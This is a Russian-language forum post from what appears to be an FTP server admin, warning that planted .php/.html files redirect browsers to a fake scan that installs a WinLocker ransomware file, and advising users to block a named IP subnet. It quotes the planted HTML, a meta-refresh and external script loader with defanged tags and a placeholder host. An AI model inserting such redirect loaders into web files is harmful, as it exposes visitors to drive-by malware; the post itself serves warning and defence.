Форум

В связи с тем что в сети появился новый WinLocker решил создать данный топик... И так как наш ФТП является относительно публичным. Почти что ежечасно появляются файлы с расширением *.php *.html в каталогах ФТП сервера... В принципе ничего опасного они из себя не представляют. Опасность основная заключается в том, что если на ФТП зайти через веб браузер и попытаться открыть данные файлы то пойдет переадресация на другой сайт с Java Script... По умолчанию ни одни файл не открывается, так написаны правила... Для большей уверенности вашей безопасности в натсройках Firewall, Antivirusa добавить ip адрес 93.186.127.92 А желательно всю подсеть... Дело в том, что предыдущий взлом был осуществлённый с одного из серверов в той под сети...

Почему ругается антивирус? Даже находясь на ФТП через клиент: Потому как в файлах прописана переадресация на другой сайт:

Код
<ht ml> <head> <ht ml> </html><met a http-equiv="Refresh" content="0; URL="http://adress/main.php?land=20&affid=50900"> <center><a href="http://adress/main.php?land=20&affid=50900">Click</a></center> <a href="http://adress/main.php?land=20&affid=50900"> Click Here</a> <tr></td> <sc ript language="javascript" src="http://adress/ad.js"></script>

В итоге на экране видим следующую картину:

Интересно как вдруг мой дебиан превратился в Windows XP???

После сканирования идет автоматическая скачка файла inst.exe который потом инсталлируется. И получается winlocker.

Данный топик носит лишь информационный характер для Вашей же безопасности в сети т.к не только на нашем ФТП появляются такие файлы, и к сожалению антивирусы их не видят как заражены.